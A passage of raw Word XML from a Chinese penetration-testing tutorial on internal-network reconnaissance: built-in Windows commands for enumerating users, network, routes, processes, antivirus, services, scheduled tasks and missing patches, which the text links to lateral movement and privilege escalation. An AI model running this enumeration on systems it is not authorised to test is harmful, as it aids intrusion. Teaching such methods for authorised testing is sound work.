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Pr>
      <w:bookmarkStart w:id="0" w:name="内网信息搜集"/>
      <w:r>
        <w:t>内网信息搜集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 内网信息搜集可以从本机信息搜集、域内信息搜集、内网资源探测、域内用户登录凭据窃取等方面进行。通过内网信息搜集，测试人员可以对当前主机的角色，当前主机所在内网的拓扑结构有整体的了解。从而选择更合适、更精准的渗透方案。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="一本机基础信息收集"/>
      <w:r>
        <w:t>一、本机基础信息收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="X289d3892e1c1c0195951c222dc46ab528bb7b9c"/>
      <w:r>
        <w:t>1、查看当前用户、权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>whoami /all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看当前用户以及当前用户所在的用户组、所拥有的特权等信息。测试人员可以对当前用户所拥有的特权有一个大致的了解，并综合判断是否需要提升权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3235325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3235845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="X6aabe0698428bd50276651e0b0e8744fcedae76"/>
      <w:r>
        <w:t>2、查看网络配置信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>ipconfig /all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看当前主机的网络配置情况，包括IP地址、主机名、各网络适配器的信息等，可以从中判断出当前主机所处的内网网段。在域环境中，DNS服务器的IP地址通常为域控制器地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="4603115"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4603315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="X7ff68a908aa915b8194a7d5d8ae106816d3777a"/>
      <w:r>
        <w:t>3、查看主机路由信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>route print</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 在路由表中的网络目标都是主机可以直接访问到的。测试人员在后续的横向渗透中可以尝试探测其中存活的主机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="4701540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4701656"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="Xdc71bde783ae3a5229e14efe57e12a1af9a4081"/>
      <w:r>
        <w:t>4、查看操作系统信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//查看操作系统及版本</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 分析 Windows 补丁 第三方软件[Java/Oracle/Flash 等]漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2834005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2834341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="Xe842439cabad490b9af41ed90410aee248a07ff"/>
      <w:r>
        <w:t>5、查看端口连接情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>netstat -ano</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看当前主机的端口连接情况，包括当前主机的TCP、UDP等端口监听或开放状况，以及当前主机与网络中其他主机建立的连接情况。与当前主机建立连接的不仅有公网主机，还有内网主机。当内网其他主机访问当前主机时，二者便会建立连接，这也是收集内网网段信息的切入点。开放端口对应的常见服务/应用程序[匿名/权限/漏洞等] 利用端口进行信息收集。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="2757170"/>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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480685" cy="2757170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="Xe2df5f5e310587140922eae32d4f03aa7e8bd5d"/>
      <w:r>
        <w:t>6、查看当前会话列表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看当前主机与所连接的客户端主机之间的会话。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3032760" cy="746760"/>
            <wp:effectExtent l="0" t="0" r="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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3032760" cy="746760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="Xc52aace31d4f3d0b55827ddeac3e35cf0b88f73"/>
      <w:r>
        <w:t>7、查看当前网络共享信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net share</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="2042160"/>
            <wp:effectExtent l="0" t="0" r="0"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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2042160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="X809fff5cc5e2451dac9d4ee091aa3ff8731386c"/>
      <w:r>
        <w:t>8、查看已连接的网络共享</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2887980" cy="868680"/>
            <wp:effectExtent l="0" t="0" r="762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12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2887980" cy="868680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="Xf92eee156179e791899e0a775265e577fc6d73a"/>
      <w:r>
        <w:t>9、查看当前进程信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>tasklist /svc</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">tasklist </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 根据得到的进程列表确定目标主机上本地程序的运行情况，并对目标主机上运行的杀毒软件等进行识别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="5059680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="5060210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>wmic process get Name, ProcessID, ExecutablePath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1486535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1486791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 通过wmic查询主机进程信息，并过滤出进程的路径，名称和PID。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>wmic process where Name="msdtc.exe" get ExecutablePath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看指定进程的路径信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="518160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="518516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="X60a73bdf7f79a45616649e78f80cb30e51f17ef"/>
      <w:r>
        <w:t>10、查看服务信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>wmic service get Caption, Name, PathName, StartName, State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看当前所有服务的信息，名称，路径，创建时间，运行状态信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="1477010"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12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16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480685" cy="1477010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>wmic service where Name="backdoor" get Caption, Name, PathName, StartName, State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看指定服务的信息，名称，路径，创建时间，运行状态信息。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="X11e278004f5cc370bac9e70364ae16112e2f102"/>
      <w:r>
        <w:t>11、查看计划任务信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>schtasks /query /v /fo list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看当前主机上所有的计划任务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481320" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="5080" b="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17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5481320" cy="1935480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="X44a55db947cfccc6f9e65e95dbf43b1c8927f8c"/>
      <w:r>
        <w:t>12、查看自启程序信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>wmic startup get Caption,Command,Location,User</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 查看当前主机上所有的自启程序信息，并过滤出程序名称，所执行的命令，程序的路径，所属用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5477510" cy="1319530"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635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18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5477510" cy="1319530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="X50dd22b2e30ed52bea8a3787631defd159e82ff"/>
      <w:r>
        <w:t>13、查看系统补丁安装信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>wmic qfe get Caption,CSName,Description,HotFixID,InstalledOn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 根据目标主机的操作系统版本和缺少的补丁辅助提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485765" cy="963930"/>
            <wp:effectExtent l="0" t="0" r="635" b="1143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19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5485765" cy="963930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="X87e6463c5735db62e057c2c11eb9a496cb08439"/>
      <w:r>
        <w:t>14、查看应用安装信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>wmic product get Caption, Version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485765" cy="3082290"/>
            <wp:effectExtent l="0" t="0" r="635" b="1143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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5485765" cy="3082290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="Xbceee9e64aab2a2925ba53c9849de8cc05c8334"/>
      <w:r>
        <w:t>15、查看本地用户/组信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
